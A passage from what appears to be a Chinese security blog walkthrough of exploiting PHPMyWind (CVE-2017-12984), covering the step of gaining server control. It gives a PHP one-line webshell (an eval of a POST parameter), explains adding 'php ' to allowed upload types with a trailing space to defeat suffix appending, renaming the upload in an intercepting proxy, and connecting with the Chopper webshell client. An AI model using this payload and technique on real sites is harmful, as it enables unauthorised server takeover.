Phpmywind XSS利用(CVE-2017-12984)

  • A+
所属分类:xss攻击 关注cms

3、获取服务器权限

打开网站系统管理,选择网站信息配置,点击附件设置,我们可以看见后台可设置上传图片的类型,在上传图片类型后面加上

|php |,提交。后台会保存变量并更新配置文件。

 

注意|php |后面的空格,上传图片时,服务器会重命名并在文件名后添加后缀,空格是用来截断自动添加的后缀。

 

Phpmywind XSS利用(CVE-2017-12984)

 

 

新建一个PHP一句话木马:<?php @eval($_POST['A']);?>,并命名为yijuhua.png。

 

Phpmywind XSS利用(CVE-2017-12984)

 

 

修改filename为"yijuhua.php ",注意.php后面有空格,点击intercept on关闭截取状态。

Phpmywind XSS利用(CVE-2017-12984)

 

 

 

 

 

可以看到文件已经上传成功,并重命名为1539244142.php,上传目录为:uploads/image/20181011/1539244142.php

 

 

Phpmywind XSS利用(CVE-2017-12984)

 

 

 

Phpmywind XSS利用(CVE-2017-12984)

 直接通过菜刀连接,连接成功,获取服务器权限。 

 

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

目前评论:1   其中:访客  0   博主  1

    • 呼呼 呼呼 Admin

      :razz: :razz: